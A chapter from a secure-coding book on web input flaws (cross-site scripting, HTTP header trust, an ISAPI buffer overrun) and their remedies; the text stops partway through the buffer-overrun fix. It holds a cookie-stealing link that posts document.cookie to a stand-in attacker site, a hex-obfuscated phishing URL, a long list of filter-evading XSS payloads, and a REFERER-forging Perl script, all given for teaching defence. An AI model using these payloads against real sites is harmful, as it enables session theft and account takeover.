Chapter 13. Web-Specific Input Issues

It’s now time to turn our attention to what is potentially the most hostile of all environments: the Web. In this chapter, I’ll focus on making sure that applications that use the Web as a transport mechanism are safe from attack. I’m assuming you’ve read Chapters 10 and 11 before reading this, and if you use a database as part of your Web-based application, you should also read Chapter 12.

Virtually all Web applications perform some action based on user requests. Let’s be honest: a Web-based service that doesn’t take user input is probably worthless! Remember that you should determine what data is valid and reject all other input. I know I sound like a broken record, but data verification is probably the most important discipline to understand when building secure applications.

In this chapter, I’ll focus on cross-site scripting issues (mainly because they are so prevalent) and HTTP trust issues, and I’ll explain which threats Secure Sockets Layer (SSL) and Transport Layer Security (TLS) help resolve. So let’s get started with the attack du jour: cross-site scripting.

Cross-Site Scripting: When Output Turns Bad

I often hear people say that cross-site scripting (XSS) issues are the most difficult attacks to explain to end users and yet they are among the easiest to exploit. I think what makes them hard to understand is the nature of the attack: the client is compromised because of a flaw in one or more Web pages. About three years ago, no one had heard of cross-site scripting issues, but now I think it’s safe to say we hear of at least one or two issues per day on the Web. So, what is the problem and why is it serious? The problem is twofold:

  • A Web site trusts input from an external, untrusted entity.

  • The Web site displays said input as output.

I bet you’ve seen ASP code like this before:

Hello,  
<%
   Response.Write(Request.Querystring("name"))
%>

This code writes out to the browser whatever is in the name field of the querystring—for example, www.contoso.com/req.asp?name=Blake. That seems okay, but what if an attacker could convince a user to click this link from, say, a Web page, a newsgroup, or an e-mail message? That doesn’t seem like a big deal, until you realize that an attacker could have the unsuspecting user click the link in this code:

<a href=www.contoso.com/req.asp?name=scriptcode>
    Click here to win $1,000,000</a>

where the scriptcode block is this:

<script>x=document.cookie;alert(x);</script>

Note that the payload normally would not look like this—it’s too easy for the victim to realize that something is amiss. Instead, the attacker will encode most of the payload to yield this:

<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
    Click here to win $1,000,000</a>

Notice two aspects of this link. First, it looks like it goes to www.microsoft.com, but it does not! It uses a little-known, but valid, URL format: http://username:password@webserver. This is defined in RFC 1738, "Uniform Resource Locators (URL)," at ftp://ftp.isi.edu/in-notes/rfc1738.txt. The most relevant text, from "3.1. Common Internet Scheme Syntax," reads like this:

While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data: //<user>:<password>@<host>:<port>/<url-path>.

Note that each part of the URL is optional. Now look at the URL again: the www.microsoft.com reference is bogus. It’s not the destination at all; it’s a username, followed by the real Web site name, which is hex-encoded to make it harder for the victim to determine what the real request is for!

OK, back to the XSS issue. The problem is the name parameter—it’s not a name, but rather HTML and JavaScript that could be used to access user data, such as the user’s cookie through the document.cookie object. As you may know, cookies are tied to a domain; a cookie in the contoso.com domain can be accessed only by Web pages in that domain, so a Web page in the microsoft.com domain cannot access a cookie in the contoso.com domain. Now think for a moment: when the user clicks the link above, in what domain does the script code execute? To answer this, simply ask yourself, "Where did the page come from?" The page came from the contoso.com domain, so it can access the cookie data in the contoso.com domain. The problem is that only one page in a domain needs to have this kind of flaw to render all client data tied to that domain insecure. This code does nothing more than display the cookie in the user’s browser. Of course, an attacker can do more harm, but I’ll cover that later.

Let me put this in perspective. In late 2001, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replayed those cookies—remember that a cookie is just a header in the HTTP request—he could spoof the e-mail recipient and access data that only that recipient could normally access.

Through cross-site scripting attacks, cookies can be read or changed (this is also called poisoning), browser plug-ins or native code tied to a domain (for example, using the SiteLock ActiveX template, discussed in Chapter 16) can be instantiated and scripted with untrusted data, and user input can be intercepted. In short, the attacker has unfettered access to the browser’s object model in the security context of the compromised domain.

A more insidious attack is Web server spoofing. Imagine that a news site has an XSS flaw. Using that flaw, the attacker has full access to the object model in the security context of the news site, so if the attacker can get a victim to navigate to the Web site, he can display a news article that comes from the attacker’s site yet appears to originate from the news site’s Web server.

Figure 13-1 should help outline the attack.

Figure 13-1. How XSS attacks work.

More Information

The real reason XSS issues exist is because data and code are mixed together. Refer to "Don’t Mix Code and Data" in Chapter 3, for more detail about this insecure design issue.

Any Web browser supporting scripting is potentially vulnerable. Furthermore, data gathered by the malicious script can be sent back to the attacker’s Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, a cross-site scripting attack can send the data to the attacker. Look at this example to see what I mean:

<a href=http://www.contoso.com/req.asp?name=
  <FORM action=http://www.badsite-sample-13.com/data.asp 
       method=post id="idForm">
       <INPUT name="cookie" type="hidden"> 
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie; 
    idForm.submit();
  </SCRIPT> >
Click here!
</a>

Note that normally this HTML code is escaped; I just broke it out in an unescaped form to make it readable. When the user clicks the link, the user’s cookie is sent to another Web site.

Important

Using SSL/TLS does not mitigate cross-site scripting issues.

XSS attacks can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that does not validate data in a Web page. (This Web server could be using a form field or querystring.) Finding such a server isn’t easy unless the attacker has some inside knowledge, but it is possible.

XSS attacks can be persisted via cookies if an XSS bug exists in a site that outputs data from cookies onto a page. To pull this off, the attacker simply infects the cookie with malicious script, and each time the victim goes back to that site, the script in the cookie is displayed, the malicious code runs, and the attack is persistent until the user removes the cookie.

More Information

A wonderful explanation of XSS issues is also available in "Cross-Site Scripting Overview" at http://www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp. And a great resource is the Open Web Application Security Project at http://www.owasp.org.

Sometimes the Attacker Doesn’t Need a <SCRIPT> Block

Sometimes, the user-supplied data is inserted in a script block. In this case, it’s not necessary for the attacker to include the <script> tag because it’s already provided by the Web site developer. However, it does mean that the result must be valid script syntax.
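
For example, imagine a page that writes the user’s input into an existing script block (a hypothetical snippet; the variable name is illustrative):

<script>
    var name = '<%= Request.QueryString("name") %>';
</script>

An attacker who supplies a name such as '; evilCode(); ' breaks out of the string literal and runs code without ever sending a <script> tag.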

You should be aware that <img src> and <a href> tags can also point to script code, not just a "classic" URL. For example, the following is a valid anchor:

<a href="javascript:alert(1);">Click here to win $1,000,000!</a>

No script block here!

The Attacker Doesn’t Need the User to Click a Link!

I know you’re thinking, "But the user has to click a link to get this to happen." Luckily for the attackers, some attacks can be automated and require little or no user interaction. The easiest attack to pull off is when the input in the querystring, form, or some other data is used to build part of an HTML tag. For example, imagine the user’s input builds this:

<a href=<%= request.querystring("url")%>>Click Here</a>

What’s wrong with this? The attacker could provide the following in the URL variable in the querystring:

http://www.microsoft.com onmouseover="malicious-script"
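
which, substituted into the anchor tag, yields HTML something like this:

<a href=http://www.microsoft.com onmouseover="malicious-script">Click Here</a>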

Now the user simply needs to move the mouse over the anchor text, and the exploit script runs. The more astute among you will realize that many tags can include onload or onactivate events, so the attack could happen with no user interaction. Need I say more?

Other XSS-Related Attacks

You should be aware of three subtle variations to the "classic" XSS attack: accessing an HTML file installed on the local computer; accessing HTML-like files, such as Windows Help files (CHM files); and accessing HTML resources. Let’s look at each.

XSS Attacks Against Local Files

The concept of XSS attacks against Web sites, while a mystery to some, is relatively well-known in the security community. What are not so well-known are XSS attacks against HTML files on a user’s computer. Local content is vulnerable to attack if the file location is predictable and it echoes input from the user. Web browsers download cacheable content to random directories on the client computer. For example, on one of my computers, the files are loaded into directories with names like CLYBG5EV, KDEJ41EB, ONWNWXYR, and W5U7GT63 (generated using CryptGenRandom!). This makes it very hard for an attacker to determine the location of the files. However, HTML files installed as part of a product installation are often placed in predictable locations, and it is this consistency that aids an attacker.

Generally, the attack happens because an HTML page takes data from a URL and uses that to build output. Take a look at this example—imagine it’s named localxss.html and it’s loaded in a directory named c:\webfiles:

<html>
    <head>
        <title>Local XSS Test</title>
    </head>
    <body>
        Hello! &nbsp;
        <script>document.write(location.hash)</script>
    </body>
</html>

This code will echo back onto the Web page whatever is after the hash symbol (#) in the URL.

The following link will display a dialog box that simply says "Hi!" if the user clicks it:

file://C:\webfiles\localxss.html#<script>alert('Hi!');</script>

This attack is a little more insidious than simply popping up a dialog box. This code now runs in the My Computer zone. (Microsoft Internet Explorer includes the notion of zones. See the coming sidebar, "Understanding Zones," for more information.) If code can come from the Internet, it’s in the Internet zone by default, but when the unsuspecting user clicks the link, the file is actually in the highly trusted My Computer zone. From an Internet Explorer perspective, this is an elevation of privilege attack.

The same issues apply to the location.search and location.href properties.

Note

Note that these attacks apply to all browsers; however, it’s only in Internet Explorer that an attack can include the notion of transgressing zones, because only Internet Explorer has zones. Attacks against local content are less of an issue in Internet Explorer 6 SP1, Microsoft Windows XP SP1, and Microsoft Windows .NET Server 2003 because navigation from the Internet zone to the My Computer zone is blocked.

Look again at Figure 13-1, replace the Internet Web server with an Intranet server, and you’ll understand this threat a little better!

HTML Help Files

HTML Help files are also potentially vulnerable to local XSS attacks. HTML Help files are a collection of HTML files compiled with the CHM file extension. You can create and decompile CHM files with Microsoft HTML Help Workshop. The attack is mounted by using the mk: protocol handler rather than http:. Treat any CHM files you create as potential XSS vulnerabilities. The same applies to any HTML document that has a non-HTML extension.

XSS Attacks Against HTML Resources

A little more obscure but still worthy of comment is accessing HTML through resources. Internet Explorer supports the res: protocol, which provides the ability to extract and display resources (such as text messages, images, or HTML files) from dynamic-link libraries (DLLs), EXE files, or other binary images. For example, res://mydll.dll/#23/ERROR will extract the HTML (#23) resource named ERROR from mydll.dll and display it. If ERROR takes input from the URL and displays it, you might have an XSS issue. This means you should treat resource HTML data just like a local HTML file.

More Information

Microsoft issued a security bulletin fixing some resource-based XSS issues in March 2002; see "28 March 2002 Cumulative Patch for Internet Explorer" at http://www.microsoft.com/technet/security/bulletin/MS02-015.asp for more information.

Remember that the Windows shell, Windows Explorer, supports the res: protocol to extract and display resources from a DLL. Therefore, you must make sure any HTML resources you include are devoid of XSS issues.

XSS Remedies

As with all user input issues, the first rule for mitigating XSS issues is to determine which input is valid and to reject all other input. (Have I said that enough times?) I’m not going to spend much time on this because this topic has been discussed ad nauseam in the previous three chapters. That said, not trusting the input is the only safe approach. Fixing XSS issues is a little like fixing SQL injection attacks—you have a hugely complex grammar to deal with, and certain characters have special meaning.

Other defense in depth mechanisms do exist, and I’ll discuss some of these, including the following:

  • Encoding output

  • Adding double quotes around all tag properties

  • Inserting data in the innerText property

  • Forcing the codepage

  • The Internet Explorer 6.0 SP1 HttpOnly cookie option

  • Internet Explorer "Mark of the Web"

  • Internet Explorer <FRAME SECURITY> attribute

  • ASP.NET 1.1 ValidateRequest configuration option

You should think of all these items except the first as defense in depth strategies because, frankly, there is only one way to solve the issue, and that’s for the server application to be hard-core about what constitutes valid input. Let’s look at each of these.

Encoding Output

Encoding user-supplied data before displaying it is a good practice. Luckily, this is simple to achieve using the ASP Server.HTMLEncode method or the ASP.NET HttpServerUtility.HtmlEncode method. These methods convert dangerous symbols, including HTML tags, to their harmless HTML representation—for example, < becomes &lt;.
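
As a simple illustration, here is the "name" example from the start of this chapter rewritten to encode its output; a minimal ASP.NET (C#) sketch of the same page:

Response.Write(Server.HtmlEncode(Request.QueryString["name"]));

An injected <script> tag now reaches the browser as &lt;script&gt; and is displayed as harmless text rather than executed.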

Adding Double Quotes Around All Tag Properties

Sometimes the attacker’s data becomes part of an HTML tag; in fact, it’s very common. For example, www.contoso.com/product.asp?id=2105 executes this ASP code:

<a href=http://www.contoso.com/detail.asp?id=<%= request.querystring("id") %>>

which yields the following HTML:

<a href=http://www.contoso.com/detail.asp?id=2105>

Exploiting this requires that the attacker provide an id value that closes the <a> tag and creates a <script> tag. This is very easy—simply make id equal to 2105><script event=onload>exploitcode</script>.

In some cases, the attacker need not close the <a> tag; he can extend the properties of the tag. For example, 2105 onclick="exploitcode" would extend the <a> tag to include an onclick event, and when the user clicks the link, the exploit code executes.

The Web developer can defend against this attack by placing optional double quotes around each tag attribute, like so:

<a href="http://www.contoso.com/detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">

Note the double quotes around the href reference. It doesn’t matter if the attacker provides a malformed id value, because detail.asp will treat the entire input—not simply the first value that constitutes a valid id—as the id. For example, 2105 onclick='exploitcode' becomes this:

<a href="http://www.contoso.com/detail.asp?2105 onclick=‘exploitcode’">

I doubt 2105 onclick='exploitcode' is a valid product at Contoso.

So why not use single quotes rather than double quotes? The reason is HTML encoding doesn’t escape single quote characters, but it does escape double quotes.
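
You can verify this with one line of ASP.NET (C#) code. A quick sketch; note that HtmlEncode’s exact output can vary across framework versions—in the versions discussed here, single quotes pass through unencoded:

string s = Server.HtmlEncode("\"double\" and 'single'");
// s now contains: &quot;double&quot; and 'single'

Because double quotes are encoded, an attacker cannot break out of a double-quoted attribute, whereas a single-quoted attribute offers no such protection.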

Inserting Data in the innerText Property

The innerText property renders arbitrary content inert and is safe to use when building content based on any user input. The following shows a simple example:

<html>
  <body>
    <span id=spnTest></span>
  </body>
</html>
<script for=window event=onload>
    spnTest.innerText = location.hash;
</script>

If you invoke this HTML code with the following URL, you’ll notice the script is rendered inert.

file://C:\webfiles\xss.html#<script>alert(1);</script>

Use of the innerHTML property, by contrast, is actively discouraged when populating a page with untrusted input. I’m sure you can work out why!

Forcing the Codepage

If your Web application restricts what is valid in a client request, it should also limit other representations of those characters. Setting a codepage, such as by using the following <meta> tag, in your Web pages will protect against the attacker using canonicalization tricks that could represent special characters using multibyte escapes:

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

This character set contains all characters necessary to type Western European languages. This encoding is also the most common encoding used on the Internet. It supports the following languages: Afrikaans, Catalan, Danish, Dutch, English, Faeroese, Finnish, French, German, Galician, Irish, Icelandic, Italian, Norwegian, Portuguese, Spanish, and Swedish. For completeness, the other ISO-8859 character sets cover the following:

  • 8859-2 Eastern Europe

  • 8859-3 South Eastern Europe

  • 8859-4 Scandinavia (mostly covered by 8859-1)

  • 8859-5 Cyrillic

  • 8859-6 Arabic

  • 8859-7 Greek

  • 8859-8 Hebrew

The Internet Explorer 6.0 SP1 HttpOnly Cookie Option

During the Windows Security Push, the Internet Explorer security team devised a way to protect the browser from XSS attacks that read the client’s cookie from script. The remedy is to add an HttpOnly option to the cookie. For example, the following cookie cannot be accessed by DHTML in Internet Explorer 6.0 SP1:

Set-Cookie: name=Michael; domain=Microsoft.com; HttpOnly

The browser will simply return an empty string if the insecure script code originating from the server attempts to read the document.cookie property. You can use the following ISAPI filter code, available in the download code, if you want to enforce this option for all cookies used by your Internet Information Services (IIS)–based Web servers.

// Portion of HttpOnly ISAPI filter code
DWORD WINAPI HttpFilterProc(
   PHTTP_FILTER_CONTEXT pfc,
   DWORD dwNotificationType,
   LPVOID pvNotification) {

   // Hard code cookie length to 2k
   CHAR szCookie[2048];
   DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
   DWORD cbCookie = cbCookieOriginal;

   HTTP_FILTER_SEND_RESPONSE *pResponse =
      (HTTP_FILTER_SEND_RESPONSE*)pvNotification;

   CHAR *szHeader = "Set-Cookie:";
   CHAR *szHttpOnly = "; HttpOnly";

   if (pResponse->GetHeader(pfc, szHeader, szCookie, &cbCookie)) {
      if (SUCCEEDED(StringCchCat(szCookie,
                                 cbCookieOriginal,
                                 szHttpOnly))) {
         if (!pResponse->SetHeader(pfc, szHeader, szCookie)) {
            // Fail securely - send no cookie!
            pResponse->SetHeader(pfc, szHeader, "");
         }
      } else {
         pResponse->SetHeader(pfc, szHeader, "");
      }
   }

   return SF_STATUS_REQ_NEXT_NOTIFICATION;
}

You can perform a similar task in ASP.NET:

HttpCookie cookie = new HttpCookie("Name", "Michael");
cookie.Path = "/; HttpOnly";
Response.Cookies.Add(cookie);

This sets the HttpOnly option on a single cookie; you can make the setting application-global by hooking the Application_OnPreSendRequestHeaders method in global.asax, as the following sketch shows.
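
Here is a minimal C# sketch of such a hook in global.asax. It assumes ASP.NET 1.x, where HttpCookie has no HttpOnly property, hence the Path trick shown above:

protected void Application_PreSendRequestHeaders(object sender, EventArgs e) {
    // Append HttpOnly to every outgoing cookie.
    HttpCookieCollection cookies = Response.Cookies;
    for (int i = 0; i < cookies.Count; i++)
        cookies[i].Path += "; HttpOnly";
}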

Likewise, you can use code like this in an ASP page:

response.addheader("Set-Cookie","Name=Mike; path=/; HttpOnly; Expires=" + CStr(Now))

Caution

Although HttpOnly is a good defense in depth mechanism, it does not defend against cookie-poisoning attacks; it only prevents malicious script from reading the cookie. Enabling this option in your cookies is not a complete solution.

Internet Explorer "Mark of the Web"

Earlier I mentioned the problem of XSS issues in local HTML files. Internet Explorer allows you to force HTML files into a zone other than the My Computer zone. This feature, available since Internet Explorer 4.0, is often referred to as "the mark of the Web," and you may have noticed it if you saved a Web page from the Internet onto your desktop. Look at Figure 13-2. This was captured from msdn.microsoft.com and saved locally, yet the zone is not My Computer—it’s in the Internet zone, because that’s where the HTML pages came from.

Figure 13-2. The MSDN homepage saved locally, yet it’s in the Internet zone, not the My Computer zone.

The secret to this is a comment placed in the file:

<!-- saved from url=(0026)http://msdn.microsoft.com/ -->

When Internet Explorer loads this file, it looks for a "saved from url" comment, and then it reads the URL and uses the zone settings on the computer to determine what security policy to apply to the Web page. If your policy prohibits certain functionality in the Internet zone (scripting, for example) but allows it in the My Computer zone, this Web page cannot use script because it has been forced into the Internet zone. The (0026) value is the string length of the URL; here, http://msdn.microsoft.com/ is 26 characters long.

You should add such a comment to your Web pages, linking back to your Web site; that way, the more restrictive policy is always enforced, regardless of how the Web page is accessed. This also applies to local HTML content—setting this option can force local HTML files into a more secure zone.

Internet Explorer <FRAME SECURITY> Attribute

Internet Explorer 6 and later introduced a new <FRAME> attribute to prohibit dangerous content in pages loaded into frames. The SECURITY attribute applies the user’s zone settings to the source file of a frame or iframe. The following example outlines how to use this property:

<IFRAME SECURITY="restricted" src="http://www.contoso.com"></IFRAME>

This will force the Web site into the Restricted Sites zone, where by default script cannot execute. Actually, not a great deal of functionality is available to a Web site in the Restricted Sites zone! If a frame is restricted by the SECURITY attribute, all nested frames share the same restrictions.

You should consider wrapping your Web site pages in a frame and using this attribute if there are ways to work around your other defensive mechanisms. Obviously, this protects only users of Internet Explorer, not those of other browsers.

More Information

Presently, the only valid <FRAME SECURITY> setting is "restricted".

ASP.NET 1.1 ValidateRequest Configuration Option

Before I explain this new ASP.NET 1.1 capability, you should realize that this does not solve the XSS problem; rather it helps reduce the chance that you accidentally leave an XSS defect in your ASP.NET code. Nothing more! By default, this option is enabled, and you should leave it that way until you are happy you have fixed all potential XSS vulnerabilities in your code. Even then I’d leave it turned on as a small insurance policy!

By default, this feature checks that users are not attempting to set HTML or script in cookies (HttpRequest.Cookies), query strings (HttpRequest.QueryString), and HTML forms (HttpRequest.Form). If the request contains such potentially dangerous input, an HttpRequestValidationException is thrown.

You can set the option as a page directive:

<%@ Page ValidateRequest="false" %>

or in a configuration file:

<!-- configuration snippet:
     can be in machine.config or a web.config
     can be scoped to an individual page using <location> around
     the <system.web> element
-->
<configuration>
  <system.web> 
     <pages validateRequest="true"/>
  </system.web>
</configuration> 

Remember, the default is true and all requests are validated, so you must actively disable this feature.
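
If you would rather show users a friendly message than the default error page when validation fires, you can trap the exception centrally. A sketch in C#, placed in global.asax; the redirect target is illustrative:

protected void Application_Error(object sender, EventArgs e) {
    // Request validation failures surface as HttpRequestValidationException,
    // sometimes wrapped inside another exception.
    Exception ex = Server.GetLastError();
    if (ex is HttpRequestValidationException ||
        ex.InnerException is HttpRequestValidationException) {
        Server.ClearError();
        Response.Redirect("requestblocked.html");
    }
}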

Don’t Look for Insecure Constructs

A common mistake made by many Web developers is to allow "safe" HTML constructs—for example, allowing a user to send <IMG> or <TABLE> tags to the Web application, but nothing else other than plain text. Do not do this. A cross-site scripting danger still exists because the attacker can embed script in some of these tags. Here are some examples:

  • <img src=javascript:alert([code])>

  • <link rel=stylesheet href="javascript:alert([code])">

  • <input type=image src=javascript:alert([code])>

  • <bgsound src=javascript:alert([code])>

  • <iframe src="javascript:alert([code])">

  • <frameset onload=vbscript:msgbox([code])></frameset>

  • <table background="javascript:alert([code])"></table>

  • <object type=text/html data="javascript:alert([code]);"></object>

  • <body onload="javascript:alert([code])"></body>

  • <body background="javascript:alert([code])"></body>

  • <p style=left:expression(alert([code]))>

A list provided to http://online.securityfocus.com/archive/1/272037 goes further:

  • <a href="javas&#99;ript&#35;[code]">

  • <div onmouseover="[code]">

  • <img src="javascript:[code]">

  • <img dynsrc="javascript:[code]">

  • <input type="image" dynsrc="javascript:[code]">

  • <bgsound src="javascript:[code]">

  • &<script>[code]</script>

  • &{[code]};

  • <img src=&{[code]};>

  • <link rel="stylesheet" href="javascript:[code]">

  • <iframe src="vbscript:[code]">

  • <img src="mocha:[code]">

  • <img src="livescript:[code]">

  • <a href="about:<s&#99;ript>[code]</script>">

  • <meta http-equiv="refresh" content="0;url=javascript:[code]">

  • <body onload="[code]">

  • <div style="background-image: url(javascript:[code]);">

  • <div style="behaviour: url([link to code]);">

  • <div style="binding: url([link to code]);">

  • <div style="width: expression([code]);">

  • <style type="text/javascript">[code]</style>

  • <object classid="clsid:..." codebase="javascript:[code]">

  • <style><!--</style><script>[code]//--></script>

  • <![CDATA[<!--]]><script>[code]//--></script>

  • <!-- -- --><script>[code]</script><!-- -- -->

  • <<script>[code]</script>

  • <img src="blah"onmouseover="[code]">

  • <img src="blah>" onmouseover="[code]">

  • <xml src="javascript:[code]">

  • <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>

  • <div datafld="b" dataformatas="html" datasrc="#X"></div>

  • \xC0\xBCscript>[code]\xC0\xBC/script>

Not all browsers support all these constructs. Some are specific to Internet Explorer, Navigator, Mozilla, and Opera, and some are generic. Bear in mind that the two lists are by no means complete. I have no doubt there are other subtle ways to inject script into HTML.

Another mistake I’ve seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Microsoft Visual Basic Scripting Edition (VBScript), which is case-insensitive, instead? Don’t think that stripping single or double quotes will help either—many script and HTML constructs take arguments without quotes.

Or how about this: you strip out jscript:, vbscript: and javascript: tags? And as you may have noted from the list above, Netscape Navigator also supports livescript: and mocha: and the somewhat obtuse &{} syntax!

In summary, you should be strict about what is valid user input, and you should make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users. You must do this because you cannot know all potential exploits.

But I Want Users to Post HTML to My Web Site!

Sometimes you simply want to allow a small subset of HTML tags so that your users can add some formatting to their comments. Accepting HTML from untrusted sources is highly discouraged because it’s extremely difficult to get right, but allowing a limited set of tags such as <EM>, <PRE>, <BR>, <P>, <I>…</I>, and <B>…</B> can be reasonably safe, so long as you use regular expressions to look for these character sequences explicitly. The following regular expression will allow these tags, as well as other safe characters:

if (/^(?:[\s\w?!,.'"]*|(?:<\/?(?:i|b|p|br|em|pre)>))*$/i) {
    # Cool, it's valid input!
}

This regular expression will allow spaces (\s); letters, digits, and underscores (\w); a limited subset of punctuation; and "<" followed by an optional "/", one of the tags i, b, p, br, em, or pre, and a closing ">". The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate that the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML even though the tags are not malicious.
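
If you prefer to do the same check in ASP.NET, a rough C# equivalent might look like this. It is a sketch only, not a complete HTML sanitizer, and the method name is illustrative:

using System.Text.RegularExpressions;

static bool IsValidComment(string input) {
    // Allow whitespace, word characters, limited punctuation,
    // and a handful of harmless formatting tags.
    return Regex.IsMatch(input,
        @"^(?:[\s\w?!,.'""]*|(?:</?(?:i|b|p|br|em|pre)>))*$",
        RegexOptions.IgnoreCase);
}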

Caution

Be careful when accepting HTML input. It can lead to compromise unless the solution is bulletproof. This issue became so bad for the distributed crypto-cracking site http://www.distributed.net that they took radical action in January 2002. You can read about the issues they faced and their remedy at http://n0cgi.distributed.net/faq/cache/268.html. By the way, the URL starts with n-zero-cgi.

How to Review Code for XSS Bugs

Here’s a simple four-step program for getting out of XSS issues:

  1. Write down all the entry points to your Web application. Remember that this includes fields in forms, querystrings, HTTP headers, cookies, and data from databases.

  2. Trace each datum as it flows through the application.

  3. Determine whether the datum is ever reflected to output.

  4. If it is reflected to output, is it clean and sanitized?

And obviously, if you find an uninspected datum that is echoed, you should pass it through a regular expression or some other sanity-checking code that looks for good things (not bad things) and then encode the output if you have any doubts. If your regular expression fails to confirm the validity of the data, you should dispose of the request.

You should also review error message pages—they have proved a target-rich environment in the past.

Finally, pay special attention to client code that uses innerHTML and document.write.

More Information

Another example of the "don’t trust user input" Web-based attack is the HTML Form Protocol Attack, which sends arbitrary data to another server by using the Web server as an attack vector. A paper outlining this attack is at http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.

Other Web-Based Security Topics

This section outlines common security mistakes I’ve seen in Web-based applications over the past few years. It’s important to note that many of these issues apply to both Microsoft and non-Microsoft solutions.

eval() Can Be Bad

You have a serious security flaw if you create server-side code that calls the JavaScript eval function (or similar) and the input to the function is determined by the attacker. JavaScript eval makes it possible to pass practically any kind of code to the browser, including multiple JavaScript statements and expressions, and have them executed dynamically. For example, eval("a=42; b=69; document.write(a+b);"); writes 111 to the browser. Imagine the fun an attacker could have if the argument string to eval were derived from a form field and left unchecked!

HTTP Trust Issues

HTTP requests are a series of HTTP headers followed by a content body. Any of this data can be spoofed because there’s no way for the server to verify that any part of the request is valid or, indeed, that it has been tampered with. Some of the most common security mistakes Web developers make include trusting the content of REFERER headers, form fields, and cookies to make security decisions.

REFERER Errors

The REFERER header is a standard HTTP header that indicates to a Web server the URL of the Web page that contained the hyperlink to the currently requested URL. Some Web-based applications are subject to spoofing attacks because they rely on the REFERER header for authentication using code similar to that of this ASP page:

<%
    strRef = Request.ServerVariables("HTTP_REFERER")
    If strRef = "http://www.northwindtraders.com/login.html" Then
        ' Cool! This page is called from Login.html!
        ' Do sensitive tasks here.
    End If
%>

The following Perl code shows how to set the REFERER header in an HTTP request and convince the server that the request came from Login.html:

use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$ua = LWP::UserAgent->new();
$req = POST 'http://www.northwindtraders.com/dologin.asp',
         [   Username => 'mike',
             Password => 'mypa$w0rd',
         ];
$req->header(Referer => 'http://www.northwindtraders.com/login.html');
$res = $ua->request($req);

This code can convince the server that the request came from Login.html, but it didn’t—it was forged! Never make any security decision based on the REFERER header or on any other header, for that matter. HTTP headers are too easy to fake. This is a variation of the oft-quoted "never make a security decision based on the name of something, including a filename" lemma.

Note

A colleague told me he sets up trip wires in his Web applications so that if the REFERER header isn’t what’s expected, he’s notified that malicious action is possibly afoot!

ISAPI Applications and Filters

After performing numerous security reviews of ISAPI applications and filters, I’ve found two vulnerabilities common to such applications: buffer overruns and canonicalization bugs. Both are covered in detail in other parts of this book, but ISAPI filters deserve special attention because in IIS 5 they run in the Inetinfo.exe process, which runs as SYSTEM. Think about it: a DLL accepting direct user input and running as SYSTEM can be a huge problem if the code is flawed. Because the potential for damage in such cases is extreme, you must perform extra due diligence when designing, coding, and testing ISAPI filters written in C or C++.

Note

Because of the potential seriousness of running flawed code as SYSTEM, by default, no user-written code runs as SYSTEM in IIS 6.

More Information

An example of an ISAPI vulnerability is the Internet Printing Protocol (IPP) ISAPI buffer overrun. You can read more about this bug at http://www.microsoft.com/technet/security/bulletin/MS01-023.asp.

The buffer overrun issue I want to spell out here is in the call to lpECB->GetServerVariable, which retrieves information about an HTTP connection or about IIS itself. The last argument to GetServerVariable is the size of the buffer into which the requested data is copied, and as with many functions that take a buffer size, it’s easy to get wrong, especially if you’re handling both Unicode and ANSI strings. Take a look at this code fragment from the IPP flaw:

TCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
    DWORD  dwSize = sizeof(g_wszHostName);
    char   szHostName[MAX_LEN + 1];
    
    //Get the server name.
    pECB->GetServerVariable(pECB->ConnID,
        "SERVER_NAME",
        szHostName, 
        &dwSize);

    //Convert ANSI string to Unicode.
    MultiByteToWideChar(CP_ACP,
        0, 
        (LPCSTR)szHostName, 
        -1, 
        g_wszHostName,
        sizeof (g_wszHostName));

Can you find the bug? Here’s a clue: the code was compiled using #define UNICODE, and TCHAR is a macro. Still stumped? There’s a Unicode/ANSI byte-size mismatch; g_wszHostName and szHostName appear to be the same length, MAX_LEN + 1, but they are not. When UNICODE is defined during compilation, TCHAR becomes WCHAR, which means g_wszHostName is MAX_LEN + 1 Unicode characters in size. Therefore, dwSize is really (MAX_LEN + 1) * sizeof(WCHAR) bytes, because sizeof(WCHAR) is 2 bytes in Windows, and g_wszHostName is twice the size of szHostName, which is composed of one-byte characters. However, dwSize, the last argument to GetServerVariable, tells IIS that the destination buffer holds twice as many bytes as szHostName actually does, so an attacker can overrun szHostName by providing data larger than sizeof(szHostName). Not only is this a buffer overrun, it’s exploitable, because szHostName is the last buffer on the stack of GetHostName, which means it’s right next to the function return address on the stack.

The fix is to change the value of the dwSize variable and use WCHAR explicitly rather than TCHAR:

WCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
    char   szHostName[MAX_LEN + 1];
    DWORD  dwSize = sizeof(szHostName);
